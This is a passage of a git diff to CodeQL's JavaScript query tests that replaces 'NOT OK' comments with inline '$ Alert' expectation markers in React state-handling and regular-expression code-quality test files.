    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js index 291e0044bb3c..e542b14ce357 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid3.js @@ -1,6 +1,6 @@ var Hello = React.createClass({ render: function() { - this.state.person.name.first = "bar" + this.state.person.name.first = "bar" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js index 1b9da154358a..6297f138f002 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid4.js @@ -1,7 +1,7 @@ var Hello = React.createClass({ render: function() { - this.state.person.name.first = "bar" - this.state.person.name.last = "baz" + this.state.person.name.first = "bar" // $ Alert + this.state.person.name.last = "baz" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js index fafcb3600a52..0e112ccd74a7 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid5.js @@ -3,7 +3,7 @@ var Hello = React.createClass({ render: function() { var that = this; - that.state.person.name.first = "bar" + that.state.person.name.first = "bar" // $ Alert return
    Hello
    ; } }); diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js index 9b88b1786b88..fc4e02c5368a 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid6.js @@ -2,6 +2,6 @@ class Component extends React.Component { constructor(props) { super(props); this.state = {}; - this.updater = () => this.state.title = 'new title'; + this.updater = () => this.state.title = 'new title'; // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js index 6393da58469f..23ce21fbca64 100644 --- a/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js +++ b/javascript/ql/test/query-tests/React/DirectStateMutation/invalid7.js @@ -2,6 +2,6 @@ class Component extends React.Component { constructor(props) { super(props); this.state = {}; - this.updater = function(){this.state.title = 'new title';}; + this.updater = function(){this.state.title = 'new title';}; // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref index bab216c48331..eed73b7bfa4c 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/InconsistentStateUpdate.qlref @@ -1 +1,2 @@ -React/InconsistentStateUpdate.ql \ No newline at end of file +query: React/InconsistentStateUpdate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..0c73d7ef0772 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -26,73 +26,73 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK - }); + counter: this.state.foo + }); // $ Alert } } class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } } class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK - }); + foo: this.state.foo + 1 + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK - }); + foo: this.state.foo + 1 + }); // $ Alert } } class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK - }); + foo: { bar: this.state.foo.bar } + }); // $ Alert } } class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // NOT OK, but ignored because it is safe in practice - }); + foo: this.state.foo, + bar: this.state.bar // OK - ignored because it is safe in practice + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK - }); + foo: self.state.foo + }); // $ Alert } upd8b() { this.setState({ - foo: this.state.foo // NOT OK - }); + foo: this.state.foo + }); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref index dfa6c80426f6..9d1de0e203a6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/UnsupportedStateUpdateInLifecycleMethod.qlref @@ -1 +1,2 @@ -React/UnsupportedStateUpdateInLifecycleMethod.ql \ No newline at end of file +query: React/UnsupportedStateUpdateInLifecycleMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..41dcc713ceb1 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
    } }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
    } @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
    } @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
    } }); @@ -97,7 +97,7 @@ React.createClass({ this.setState({}) }, render: function() { - this.indirectUpdate(); + this.indirectUpdate(); // $ Alert return
    } }); @@ -105,9 +105,9 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ name: this.props.name.toUpperCase() - }); + }); // $ Alert }, render: function() { return
    Hello {this.state.name}
    ; @@ -115,9 +115,9 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ name: this.props.name.toUpperCase() - }); + }); // $ Alert }, render: function() { return
    Hello {this.state.name}
    ; @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected index fd0b9853a6ac..74825d5a26d8 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.expected @@ -1,7 +1,7 @@ -| issue7506.js:12:1:12:34 | class C ... e\\n }\\n} | Component state property 'p1' is $@, but it is never read. | issue7506.js:15:5:15:10 | p1: '' | written | -| undefined.js:1:1:1:34 | class C ... }\\n} | Component state property 'notWritten' is $@, but it is never written. | undefined.js:8:9:8:29 | this.st ... Written | read | -| undefined.js:1:1:1:34 | class C ... }\\n} | Component state property 'notWrittenButReadInChain' is $@, but it is never written. | undefined.js:9:9:9:43 | this.st ... InChain | read | -| undefined.js:32:1:32:34 | class C ... }\\n} | Component state property 'notWrittenThrougExternalPropertyAccess' is $@, but it is never written. | undefined.js:35:9:35:57 | this.st ... yAccess | read | -| undefined.js:61:19:61:19 | {\\n r ... ;\\n }\\n} | Component state property 'notWrittenInKnownInitializerObject' is $@, but it is never written. | undefined.js:64:9:64:53 | this.st ... rObject | read | -| unused.js:1:1:1:34 | class C ... }\\n} | Component state property 'notRead' is $@, but it is never read. | unused.js:6:9:6:26 | this.state.notRead | written | -| unused.js:27:1:27:34 | class C ... }\\n} | Component state property 'notReadThrougExternaPropertyAccess' is $@, but it is never read. | unused.js:30:9:30:53 | this.st ... yAccess | written | +| issue7506.js:12:1:12:45 | class C ... e\\n }\\n} | Component state property 'p1' is $@, but it is never read. | issue7506.js:15:5:15:10 | p1: '' | written | +| undefined.js:1:1:1:45 | class C ... }\\n} | Component state property 'notWritten' is $@, but it is never written. | undefined.js:8:9:8:29 | this.st ... Written | read | +| undefined.js:1:1:1:45 | class C ... }\\n} | Component state property 'notWrittenButReadInChain' is $@, but it is never written. | undefined.js:9:9:9:43 | this.st ... InChain | read | +| undefined.js:32:1:32:45 | class C ... }\\n} | Component state property 'notWrittenThrougExternalPropertyAccess' is $@, but it is never written. | undefined.js:35:9:35:57 | this.st ... yAccess | read | +| undefined.js:61:19:61:30 | { // $ ... ;\\n }\\n} | Component state property 'notWrittenInKnownInitializerObject' is $@, but it is never written. | undefined.js:64:9:64:53 | this.st ... rObject | read | +| unused.js:1:1:1:45 | class C ... }\\n} | Component state property 'notRead' is $@, but it is never read. | unused.js:6:9:6:26 | this.state.notRead | written | +| unused.js:27:1:27:45 | class C ... }\\n} | Component state property 'notReadThrougExternaPropertyAccess' is $@, but it is never read. | unused.js:30:9:30:53 | this.st ... yAccess | written | diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref index 2b285a04cd8f..a767c2444b8d 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/UnusedOrUndefinedStateProperty.qlref @@ -1 +1,2 @@ -React/UnusedOrUndefinedStateProperty.ql \ No newline at end of file +query: React/UnusedOrUndefinedStateProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,14 +1,14 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } @@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); -React.createClass({ +React.createClass({ // $ Alert render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
    ; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
    ; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } @@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

    Hello

    ; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } @@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return

    Hello

    ; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref index 3c5f29d2f914..0096b5fd9e9c 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref @@ -1 +1,2 @@ -RegExp/BackrefBeforeGroup.ql \ No newline at end of file +query: RegExp/BackrefBeforeGroup.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref index a9ba2975bb7c..181646694e12 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref @@ -1 +1,2 @@ -RegExp/BackrefIntoNegativeLookahead.ql +query: RegExp/BackrefIntoNegativeLookahead.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref index 1d1f9bbe756e..17bb483eba24 100644 --- a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref @@ -1 +1,2 @@ -RegExp/BackspaceEscape.ql \ No newline at end of file +query: RegExp/BackspaceEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js index 7796e660bbaa..1fd49f807e75 100644 --- a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js @@ -1,4 +1,4 @@ /\bx\b/; -/[\b]x/; +/[\b]x/; // $ Alert /[\ch]x[\cH]/; /\ch\ch/; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref index 790af75f6e4a..a04b25019d43 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref @@ -1 +1,2 @@ -RegExp/DuplicateCharacterInCharacterClass.ql \ No newline at end of file +query: RegExp/DuplicateCharacterInCharacterClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 82c0ebcd566d..c87c7140a16c 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js @@ -1,14 +1,14 @@ -/[foo]/; +/[foo]/; // $ Alert /[a-zc]/; /[\uDC3A\uDC3C]/; -/[??]/; -/[\u003F\u003f]/; -/[\u003F?]/; -/[\x3f\u003f]/; -/[aaa]/; -/[\x0a\x0a]/; -/[\u000a\n]/; +/[??]/; // $ Alert +/[\u003F\u003f]/; // $ Alert +/[\u003F?]/; // $ Alert +/[\x3f\u003f]/; // $ Alert +/[aaa]/; // $ Alert +/[\x0a\x0a]/; // $ Alert +/[\u000a\n]/; // $ Alert /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); const regex = /\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv; diff --git a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref index 55f7a866513d..d6c8edc76cad 100644 --- a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref +++ b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref @@ -1 +1,2 @@ -RegExp/EmptyCharacterClass.ql \ No newline at end of file +query: RegExp/EmptyCharacterClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js index d234847bbe54..b685d92d94f8 100644 --- a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js 